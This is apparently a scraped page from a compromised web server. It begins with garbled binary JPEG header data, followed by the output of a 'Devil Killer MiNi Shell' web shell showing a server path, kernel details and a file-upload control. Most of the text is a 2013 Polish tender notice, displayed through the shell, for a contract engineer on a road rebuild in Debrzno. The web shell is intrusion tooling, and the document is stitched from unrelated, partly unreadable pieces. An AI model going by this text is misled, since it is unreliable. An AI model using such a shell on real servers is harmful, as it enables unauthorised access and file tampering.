JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131202/258143-N-2013.html

<p class="kh_header"><b>Debrzno: Pełnienie funkcji Inżyniera kontraktu dla zadania pn.:

Przebudowa ul. Długiej w celu utworzenia małej obwodnicy Debrzna</b><br>
<b>Numer ogłoszenia: 258143 - 2013; data zamieszczenia: 02.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Debrznie , ul. Traugutta 2, 77-310 Debrzno, woj. pomorskie, tel. 059 8335366, faks 059 8335351.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.debrzno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera kontraktu dla zadania pn.:

Przebudowa ul. Długiej w celu utworzenia małej obwodnicy Debrzna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi wykonywane przez Wykonawcę obejmujące zarządzanie i nadzór nad Projektem (pełnienie funkcji Inżyniera Kontraktu), a także pomoc techniczna dla Zamawiającego.
2.Szczegółowe Specyfikacje Techniczne na wykonanie usługi Inżyniera Kontraktu stanowią Załącznik nr 10 do SIWZ.
3.Charakterystyka kontraktu.
1)Przedmiotem Projektu realizowanego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego i współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego jest:
Przebudowa ul. Długiej w celu utworzenia małej obwodnicy Debrzna. 
2)Projekt obejmuje:
- budowę kanalizacji deszczowej,
- budowa instalacji do gromadzenia, oczyszczania oraz odprowadzenia ścieków ( wody
  deszczowe),
- przebudowę kanalizacji sanitarnej,
- przebudowę sieci wodociągowej,
- budowę oświetlenia ulicznego,
- przebudowę linii energetycznej,
- przebudowę sieci telekomunikacyjnej,
- budowę ściany oporowej,
- budowę urządzenia organizacji i bezpieczeństwa ruchu,
- przebudowę ul. Długiej,
- budowę dwóch skrzyżowań typu rondo ( ul. Harcerska DW 188 z ul. Sportową
  i włączeniem ul. Długiej oraz ul. Królewska Dpow. 2546G, ul. Młynarska D Pow. 
  2552G, ul.
  Niepodległości Dpow. 2546G z włączeniem ul. Długiej,
- przebudowę ul. Dobrej - droga gminna,
- budowę skrzyżowania typu T skanalizowane - ul. Długiej z ul. Dobra,
- budowę skrzyżowania ul. Dobrej z ul. Niepodległości droga powiatowa 2546G,
- budowę zatoki autobusowej z m. postojowymi w ciągu ul. Długiej,
- budowę chodników,
- przebudowę schodów 
Szczegółowy zakres inwestycji zawiera dokumentacja projektowa.
4.Wykonawca w ramach niniejszego kontraktu ma za zadanie:
1)Wypełnienie roli Inżyniera Kontraktu dla kontraktu na roboty budowlane w zakresie:
a)nadzór nad wdrożeniem Kontraktu na Roboty, w zakresie zarządzania technicznego,włączając obowiązki inspektorów nadzoru prowadzonego zgodnie z warunkami polskiego prawa budowlanego, jak również innych wymagań wynikających z wykonywanego kontraktu  na roboty,
b)nadzór nad wdrażaniem Kontraktu na Roboty obejmujący administracyjne i finansowe zarządzanie prowadzone zgodnie z procedurami Regionalnego Programu Operacyjnego dla  Województwa Pomorskiego, polskimi regulacjami i wymaganiami, które wynikają  z kontraktów  na roboty m.in. polskim prawem budowlanym,
c)prowadzenie spójnego finansowego i technicznego zarządzania kontraktami na roboty,
d)wsparcie terminowego przejęcia robót przez Zamawiającego,
e)prowadzenie konsultacji dla Zamawiającego w zakresie rozstrzygania bieżących problemów budowy.
2)Pomoc Techniczna dla Zamawiającego w zakresie działań związanych z przestrzeganiem reguł wdrażania Projektu.
5.Inżynier Kontraktu będzie odpowiedzialny za przygotowanie i zrealizowanie usług zgodnie z wymaganiami wdrażania Programu i uregulowaniami prawa polskiego, w szczególności Ustawy Prawo Budowlane, Ustawy Prawo Zamówień Publicznych oraz Kodeksu cywilnego. Usługi obejmują monitoring, raportowanie, gromadzenie dokumentów i danych do pełnej kontroli realizacji inwestycji jak również jej rzeczowego i finansowego rozliczenia.Inżynier Kontraktu będzie zarządzał Kontraktem na Roboty do dnia wystawienia ostatecznego Świadectwa Wykonania.
6.Pomoc Techniczna dla Zamawiającego obejmować będzie działania związane z przestrzeganiem reguł wdrażania Projektu.
7.Szczegółowe działania : 
1)w związku z zarządzaniem Projektem, Inżynier Kontraktu powinien zapewnić profesjonalny i kompetentny nadzór inwestorski we wszystkich branżach zgodnie z wymogami prawa budowlanego, w szczególności z zapisami Ustawy z 7 lipca 1994 Prawo budowlane (tekst jednolity Dz.U. z 2006 r. nr 156 poz.1118 z późniejszymi zmianami), poprzez wyznaczenie ze swego grona inspektorów nadzoru inwestorskiego (art.25 i art.26) i zapewnienie koordynacji ich pracy (art. 27).
2)pełnienie funkcji Inżyniera Kontraktu
3)do głównych obowiązków i zadań Inżyniera Kontraktu należą:
a)utrzymywanie na bieżąco kontaktu ze wszystkimi uczestnikami Projektu,
b)monitorowanie i kontrola Projektu pod względem technicznym, finansowym i organizacyjnym,
c)informowanie Zamawiającego o wszystkich problemach istniejących i przewidywanych razem ze sposobami ich rozwiązywania i lub działaniami korygującymi mającymi na celu usuwanie takich problemów,
d)współpraca z Zamawiającym w egzekwowaniu postanowień Projektu,
e)składanie sprawozdań dotyczących między innymi fizycznego i finansowego postępu Robót, kosztów i budżetu,
f)współpraca z Zamawiającym w administrowaniu i finansowym zarządzaniu Projektem - włączając w to przygotowanie wskaźników postępu fizycznego i finansowego, jaki jest niezbędny do raportowania, sporządzanie finansowej księgowości itd.,
4)Ponadto Inżynier Kontraktu  zobowiązany będzie  do uczestnictwa:
a)w przeglądach wynikłych z tytułu rękojmi za wady w terminach 12, 24, 36, 48, 60 miesięcy od dnia rozpoczęcia okresów z tytułu rękojmi za wady,
b)wynikających  z  konieczności złożenia  wyjaśnień w związku ze złożeniem przez Zamawiającego wniosków o  płatność oraz udzielenie  wyjaśnień, w tym w ramach prowadzonych kontroli i audytów , w okresie trwałości  projektu pn.: Przebudowa ul. Długiej w celu utworzenia małej obwodnicy Debrzna ,
8 Zakres prac
8.1. PRACE WSTĘPNE ZWIĄZANE Z PRZYGOTOWANIEM PROJEKTU DO REALIZACJI
8.1.1. zapoznanie się z umową o dofinansowanie projektu z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, w szczególności z wnioskiem o dofinansowanie stanowiącym załącznik do w.w umowy, 
8.1.2. w terminie 14 dni od daty podpisania umowy Inżynier Kontraktu opracuje i przekaże  Zamawiającemu do akceptacji procedury, które uszczegółowią zasady wzajemnej wspólnej realizacji projektu, zgodnie z umową o dofinansowanie projektu,  oraz z zasadami obowiązującymi u Zamawiającego, w szczególności:
a) opracuje procedury obiegu dokumentów księgowych i nadzoru nad nimi,
b) opracuje procedury obiegu dokumentów innych niż księgowe i nadzoru nad nimi,
c) opracuje procedury archiwizowania dokumentów,
d) dokona przeglądu zasad (polityki) rachunkowości pod kątem prawidłowości ewidencji księgowej realizowanego projektu i ewentualnie wniesie o dokonanie stosownych korekt przy założeniu, że :
- SIWZ na roboty budowlane  sporządza Inżynier Kontraktu a Zamawiający dokona sprawdzenia i zatwierdzenia SIWZ, 
8.1.3. będzie dokonywał sprawdzenia i zaopiniowania otrzymanej od Zamawiającego dokumentacji projektowych wraz z kosztorysami inwestorskimi, na podstawie której ogłoszone zostanie postępowanie przetargowe na wyłonienie wykonawcy robót budowlanych, w terminie 21 dni od daty przekazania ww. dokumentów,
8.1.4. dokona  aktualizacji kosztorysów inwestorskich, Inżynier Kontraktu dokona powyższych czynności w terminie 14 dni od daty, przekazania ww. dokumentów,
8.1.5. przeprowadzi inspekcję terenu budowy w celu sprawdzenia zgodności stanu istniejącego z dokumentacją projektową,
8.2.  ZAPEWNIENIE KWALIFIKOWALNOŚCI WYDATKÓW POPRZEZ PRAWIDŁOWE
STOSOWANIE USTAWY PRAWO ZAMÓWIEŃ PUBLICZNYCH I WYTYCZNYCH RPO:
8.2.1. kontrola i nadzór nad przeprowadzeniem procedur przetargowych na wyłonienie Wykonawcy robót budowlanych wynagradzanego wynagrodzeniem ryczałtowym w drodze przetargu nieograniczonego; w szczególności poprzez:
a) opracowanie, w uzgodnieniu z Zamawiającym - Miastem i Gminą Debrzno, materiałów przetargowych w postaci Specyfikacji Istotnych Warunków Zamówienia i innych niezbędnych załączników, w tym projektu umowy z Wykonawcą w formie papierowej i elektronicznej (w terminie nie dłuższym niż 21 dni od dnia przekazania przez Zamawiającego kompletnej dokumentacji projektowo- kosztorysowej). Dokumentacja do ogłoszenia przetargu podpisywana jest przez Zamawiającego- Miasto i Gminę Debrzno.
Uczestnictwo w pracach komisji przetargowej, udzielanie wyjaśnień Wykonawcom, przygotowanie dokumentacji z przeprowadzonego postępowania (w tym protokół z postępowania, korespondencja  z Wykonawcami).
b) sporządzanie projektów pism zawierających odpowiedzi na zapytania Wykonawców, w terminie 2 dni roboczych od dnia przekazania zapytania,
c) sporządzanie projektów odpowiedzi na wniesione środki ochrony prawnej zawarte w Dziale VI ustawy - Prawo Zamówień Publicznych i przekazanie Zamawiającemu do akceptacji w terminie 7 dni roboczych od dnia przekazania odwołania,
d) reprezentowanie Zamawiającego przed Krajową Izbą Odwoławczą,  
e) udział z głosem doradczym w pracach Komisji Przetargowej. 
f) stosowanie odpowiedniego oznakowywania dokumentacji, w szczególności korespondencji bieżącej, zgodnie z wytycznymi dla RPO WP.
8.3. PEŁNIENIE NADZORU INWESTORSKIEGO NAD REALIZACJĄ PROJEKTU
8.3.1.Strony ustalają, że do obowiązków Inżyniera Kontraktu należy pełny zakres czynności jaki dla inspektora nadzoru przewiduje ustawa z dnia 07.07.1994r. Prawo budowlane Dz. U. z 2006 Nr 156, poz. 1118 z późn. zm.), oraz zakres usług obejmuje również nadzór nad robotami polegającymi na  kształtowaniu  i pielęgnacji terenów zieleni, poprzez:
a) reprezentowanie Zamawiającego  na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i decyzją o zezwoleniu na realizacje inwestycji drogowej , przepisami oraz zasadami wiedzy technicznej;
b) sprawdzanie jakości wykonywanych robót i  zastosowanych materiałów/wyrobów , a w  szczególności zapobieganie zastosowaniu  materiałów wadliwych, niepełnowartościowych;
c) sprawdzanie i odbiór robót  ulegających zakryciu lub zanikających, uczestniczenie w  odbiorach oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów i przekazywanie ich do użytkowania;
d) potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także kontrolowanie rozliczeń budowy.
8.3.2. W przypadku niejasności w zakresie praw i obowiązków Inżyniera Kontraktu ustala się, iż celem niniejszej umowy jest stworzenie całościowego efektywnego systemu nadzoru inwestorskiego nad zadaniem inwestycyjnym, o którym mowa w Rozdziale III.
8.3.3. W przypadku niejasności w zakresie praw i obowiązków Zleceniobiorcy ustala się, iż celem niniejszej usługi jest stworzenie całościowego efektywnego systemu nadzoru inwestorskiego nad zadaniami inwestycyjnymi realizowanymi w ramach projektu pn.:  Przebudowa ul. Długiej w celu utworzenia małej obwodnicy Debrzna . Inżynier Kontraktu podczas realizacji umowy zobowiązany jest do takiego działania na rzecz i w imieniu Zamawiającego, aby najkorzystniej zrealizować inwestycje tj. przy utrzymaniu standardów jakości działać na rzecz terminowego zakończenia realizacji inwestycji, w szczególności: 
a) reprezentowanie Zamawiającego na placu budowy poprzez sprawowanie kontroli zgodności realizacji zadania inwestycyjnego, z obowiązującymi przepisami i polskimi normami, zasadami wiedzy technicznej, z Dokumentacją Projektową, Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych, decyzją o zezwoleniu na realizacje inwestycji drogowej, decyzją środowiskową, umową o dofinansowanie zawartą między Zamawiającym a  Województwem Pomorskim, umowami o wykonanie robót budowlanych, dotyczącymi  realizacji zadań inwestycyjnych, zawartymi pomiędzy Zamawiającym a Wykonawcami, 
b) sprawdzanie jakości wykonanych robót, wbudowanych wyrobów, a w szczególności zapobieganie stosowaniu wyrobów wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie; wszelkie zastosowane materiały budowlane na zadaniu inwestycyjnym muszą być nowe oraz odpowiadać co do jakości wymaganiom określonym w ustawie z dnia 16 kwietnia 2004r. o wyrobach budowlanych (Dz. U. , Nr 92, poz. 881), a także wymaganiom jakościowym określonym w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych oraz Dokumentacji Projektowej.
c) koordynacja robót poszczególnych branż,
d) sprawdzanie i odbiór robót ulegających zakryciu lub zanikowi i sporządzenie na tą okoliczność częściowego protokołu odbioru, uczestniczenie w próbach, badaniach, oględzinach oraz przygotowanie i udział w czynnościach przekazania placu budowy, odbiorów częściowych i odbiorów  końcowych,
e) potwierdzenie faktycznie wykonanych robót, usunięcia wad oraz kontrolowanie rozliczeń budowy,
f) kontrola prawidłowości prowadzenia Dziennika Budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego oraz wyceny robót,
g) rozstrzyganie wątpliwości natury technicznej powstałych w toku prowadzonych robót a w razie potrzeby zaciągania opinii autora projektu,
h) stwierdzanie gotowości do odbiorów robót zanikowych, odbiorów częściowych i końcowych wpisem do Dziennika Budowy oraz pisemne poinformowanie o tym fakcie Zamawiającego.
i) potwierdzanie faktycznie wykonanego zakresu robót jako podstawy do fakturowania częściowego zgodnie z postanowieniami umowy zawartej pomiędzy Zamawiającym a Wykonawcami,
j) sprawdzanie pod względem zasadności wykonania, obmiaru oraz kontroli merytorycznej i rachunkowej wycen robót dodatkowych, przedstawianie do zatwierdzania protokołów konieczności robót dodatkowych - wprowadzanie ich do realizacji po uzyskaniu akceptacji projektanta (rysunki zamienne lub wpis do Dziennika Budowy) i Zamawiającego (umowa na roboty dodatkowe);kompletowanie protokołów nadzoru autorskiego, kompletowanie  dokumentacji z naniesionymi  poprawkami  projektanta na dokumentacje projektowe, kompletowanie protokołów odbioru robót zanikowych, prób technicznych, itp. wynikających z prawa budowlanego i norm branżowych,
k) przeglądanie i analiza rysunków wykonawczych i dokumentów wykonawczych sporządzanych przez Wykonawcę Kontraktu na Roboty z komentarzami dla Zamawiającego (jeżeli wystąpi taka potrzeba), jeśli chodzi o zgodność (lub niezgodność) z kontraktami na roboty budowlane,
l)  przeglądanie rysunków roboczych Wykonawcy Kontraktu na Roboty zawierających zmiany,zatwierdzanie robót zamiennych,
m) przeprowadzanie regularnych inspekcji Placu Budowy sprawdzających jakość wykonania i materiałów zgodnie z Kontraktem na Roboty oraz dobrą praktykę inżynierską,
n) zatwierdzanie materiałów budowlanych i instalacyjnych, urządzeń oraz dostaw, mających być wbudowane, jak zaplanował to Wykonawca Kontraktu na Roboty, sprawdzanie jakości dokumentów, zezwoleń, deklaracji zgodności, certyfikatów itd., w celu uniknięcia użycia materiałów uszkodzonych lub nie mających polskich certyfikatów,  organizowanie testów jakości przez specjalistyczne instytuty, jeżeli jest to potrzebne, na prośbę i koszt Zamawiającego,  sprawdzanie odpowiedniości i autentyczności wszystkich certyfikatów, ubezpieczeń, zabezpieczeń, gwarancji, praw własności itd., za które Wykonawca Kontraktu na Roboty jest odpowiedzialny zgodnie z warunkami kontraktu,
o)   zatwierdzanie proponowanych metod wykonywania robót budowlanych, włączając w to roboty tymczasowe zaproponowane przez Wykonawcę Kontraktu na Roboty, rekomendowanie wszystkich zmian w planach i specyfikacjach, które mogą okazać się niezbędne lub pożądane podczas lub w następstwie wykonywania robót budowlanych, szacowanie i weryfikowanie robót dodatkowych zaproponowanych przez Wykonawcę Kontraktu na Roboty, w zakresie wartości fizycznych i finansowych,
u)  uzgadnianie z Zamawiającym wszelkich zmian dotyczących wartości robót, v) negocjowanie z Wykonawcą Kontraktu na Roboty i pisemne rekomendowanie Zamawiającemu na bieżąco wszystkich robót spoza harmonogramu,
p)  nadzorowanie i rozliczanie w ramach niniejszego zamówienia wszelkich robót dodatkowych wynikłych w trakcie realizacji projektu,  nadzorowanie testów oraz zlecanie i przeglądanie podręczników operacyjnych przygotowanych przez Wykonawcę Kontraktu na Roboty do ułatwienia przejęcia urządzeń, przejrzenie kompletnej dokumentacji powykonawczej i dostarczenie jej do Zamawiającego wraz z dokumentacją dotyczącą nadzorowanych robót (włączając w to ekspertyzy geodezyjne) w formie uzgodnionej z Zamawiającym,
r) składanie miesięcznych raportów o stanie zaawansowania inwestycji  oraz występujących  trudnościach w realizacji zadania inwestycyjnego i odstępstwach od umów zawartych przez Zamawiającego z Wykonawcami w terminie do 5 - go dnia miesiąca za miesiąc poprzedni,
s) przygotowanie w imieniu Zamawiającego kompletu dokumentów oraz złożenie zawiadomienia o zakończeniu budów do Powiatowego Inspektora Nadzoru Budowlanego  i przekazanie kopii wniosku Zamawiającemu z potwierdzona datą wpływu PINB i oświadczeniem o przyjęciu go bez zastrzeżeń,
m) uczestniczenie w przeglądach wynikłych z rękojmi w terminach 12, 24, 36, 48 i 60 miesięcy od dnia rozpoczęcia okresów  rękojmi,
t) obowiązkowy udział w  radach budowy, nie częściej niż  dwa razy w miesiącu, w terminach wyznaczonych przez Zamawiającego. W okresie kiedy roboty budowlane nie będą wykonywane z powodu tzw. przerwy zimowej strony dopuszczają możliwość rzadszego organizowania rad budowy, jednak nie rzadziej niż to wynika z charakteru zawartej między stronami umowy i obowiązujących przepisów.
w) jeżeli w okresie realizacji robót zajdzie uzasadniona konieczność wykonania robót dodatkowych niezbędnych do prawidłowego wykonania przedmiotu umowy Inżynier Kontraktu powinien niezwłocznie zawiadomić o tym fakcie Zamawiającego w formie sporządzonego protokołu konieczności wraz z uzasadnieniem i kosztorysem. Pisemna zgoda Zamawiającego będzie podstawą wszczęcia postępowania, o którym mowa w art. 67 ust. 5  ustawy Prawo zamówień publicznych i zawarcia stosownej umowy z Wykonawcą i wykonania robót dodatkowych.
8.3.4. W przypadku wystąpienia robót dodatkowych obowiązkiem Zleceniobiorcy będzie pełnienie nadzoru zgodnie z obowiązkami przewidzianymi w niniejszej umowie bez odrębnego wynagrodzenia.
8.3.5. Obowiązki o których mowa w pkt.4 wykonywane będą poprzez pobyt koordynatora/inspektora nadzoru odpowiednio do potrzeb wynikających z toku budowy jednak nie rzadziej niż trzy razy w tygodniu w godzinach pracy  Urzędu Miasta i Gminy Debrzno. Pobyt musi być udokumentowany wpisem do Dzienników Budów i podpisem na liście obecności złożonym w siedzibie Zamawiającego wraz z ustnym przekazaniem informacji o stanie zaawansowania prac na placu budowy. 
8.3.6. W okresie kiedy roboty budowlane nie będą wykonywane z powodu tzw. przerwy zimowej strony dopuszczają możliwość rzadszego wizytowania placu budowy, jednak nie rzadziej niż to wynika z charakteru zawartej między stronami umowy i obowiązujących przepisów.
8.3.7. Ponadto Inżynier Kontraktu  zobowiązany będzie do będzie  do uczestnictwa  w przeglądach wynikłych z rękojmi w terminach 12, 24, 36, 48, 60 miesięcy od dnia rozpoczęcia okresów gwarancji i rękojmi oraz  wynikających  z  konieczności złożenia  wyjaśnień w związku ze złożeniem przez Zamawiającego wniosków o  płatność oraz udzielenie  wyjaśnień, w tym w ramach prowadzonych kontroli i audytów , w okresie trwałości  projektu Przebudowa ul. Długiej w celu utworzenia małej obwodnicy Debrzna
8.4. DOKONYWANIE ROZLICZEŃ FINANSOWYCH  PROJEKTU  Z INSTYTUCJĄ ZARZĄDZAJĄCĄ POPRZEZ OPRACOWYWANIE WNIOSKÓW O PŁATNOŚĆ Z NIEZBĘDNYMI ZAŁĄCZNIKAMI
8.4.1. Uzgadnianie zmian harmonogramu rzeczowo-finansowego realizacji zadania i planu płatności w przypadku wystąpienia takiej konieczności; harmonogram ma być sporządzany w formie Wykresu Gantta, z zaznaczeniem następników i poprzedników, harmonogram ma być dostarczany Zamawiającemu w formie papierowej i elektronicznej do edycji,
8.4.2. Egzekwowanie od Wykonawcy robót rozliczeń i weryfikowanie ich łącznie z dokumentami stanowiącymi podstawę rozliczenia,
8.4.3. Sprawdzanie pod względem merytorycznym oraz wnioskowanie o zatwierdzanie do wypłaty faktur wystawionych przez Wykonawcę robót na podstawie faktycznie wykonanych robót,
8.4.4. Ścisła współpraca z Zamawiającym i dostarczanie wszystkich niezbędnych dokumentów dotyczących rozliczeń,
8.4.5.Dokonanie końcowego rozliczenia rzeczowo-finansowego robót,
8.4.6. Opracowywanie Planu Płatności, Harmonogramu Rzeczowo-Finansowego oraz Harmonogramu Realizacji Projektu wraz z niezbędnymi aktualizacjami,
8.4.7.Dostarczanie sporządzanych dokumentów do Zamawiającego w czasie umożliwiającym terminowe doręczenie ich do instytucji odpowiedzialnych za realizację RPO WP,
8.4.8. prowadzenie sprawozdawczości wraz z rozliczeniami finansowymi, opracowywanie wniosków o płatność i przygotowywanie dokumentów rozliczeniowych,
8.4.9. Weryfikacja dokumentów rozliczeniowych z podziałem na wydatki kwalifikowane i niekwalifikowane, 
8.4.10.Udostępnianie do kontroli, przeprowadzanych przez uprawnione instytucje, dokumentacji związanej z realizacją zadań Inżyniera Kontraktu,
8.4.11.prowadzenie monitoringu rzeczowo-finansowego projektu w celu jego prawidłowego rozliczenia, w sposób wskazany przez Instytucje Zarządzającą w umowie o dofinansowanie, w szczególności gromadzenie niezbędnej dokumentacji rozliczeniowej, sporządzanie raportów okresowych i końcowych,
8.4.12.całkowite, końcowe rozliczenie rzeczowe i finansowe projektu zgodnie z umową o dofinansowanie w ramach  RPO WP i obowiązującymi zasadami rozliczania inwestycji,
8.4.13. przygotowanie wszelkich niezbędnych danych wartościowych, ilościowych i ich kompletowanie w postaci dokumentów niezbędnych dla końcowego rozliczenia projektu.
8.5.SKŁADANIE  SPRAWOZDAWCZOŚCI ZWIĄZANEJ Z REALIZACJĄ PROJEKTU POPRZEZ SPORZĄDANIE RAPORTÓW W ZAKRESIE RZECZOWYM I FINANSOWYM
8.5.1. Inżynier Kontraktu zobowiązany  jest do raportowania z postępów realizacji projektu oraz z postępu  swojej pracy , poprzez składanie raportów,sprawozdań w zakresie rzeczowym i finansowym: 
a) sprawozdanie wstępne - sporządzi i przekaże Zamawiającemu w terminie 14 dni od dnia przekazania placu budowy Wykonawcy robót, które obejmie informację i uwagi wynikające z przeglądu dokumentacji oraz inspekcji terenu budowy, 
b)sprawozdania miesięczne - sporządzi i przekaże Zamawiającemu co miesiąc do piątego dnia roboczego następnego miesiąca. Sprawozdanie winno zawierać: informację z postępu robót w stosunku do harmonogramu rzeczowo - finansowego, informacje o powstałych problemach, plan robót na kolejne miesiące, zaawansowanie finansowe oraz prognozę wydatków na kolejne miesiące, fotografie dokumentujące postęp robót, wykaz ewentualnych zmian z podaniem ich wartości,
c) sprawozdanie przejściowe - sporządzi i przekaże Zamawiającemu w terminie 5 dni od przeprowadzenia symulacji rzeczowo-finansowej po wykonaniu 50 % zakładanych robót budowlanych,
d) sprawozdanie końcowe - sporządzi i przekaże Zamawiającemu w terminie 10 dni od końcowego rozliczenia rzeczowo - finansowego robót. Sprawozdanie winno zawierać wszystkie informacje dotyczące wykonania prac budowlanych wraz z przeprowadzoną analizą zgodności wykonanych robót z założonym harmonogramem rzeczowo-finansowym oraz analizę głównych problemów i proponowane zalecenia dla przyszłych działań o podobnym charakterze; Zatwierdzone przez Zamawiającego sprawozdanie końcowe będzie stanowiło podstawę zwolnienia zabezpieczenia należytego wykonania umowy dla Wykonawcy robót i dla Zarządzającego projektem, 
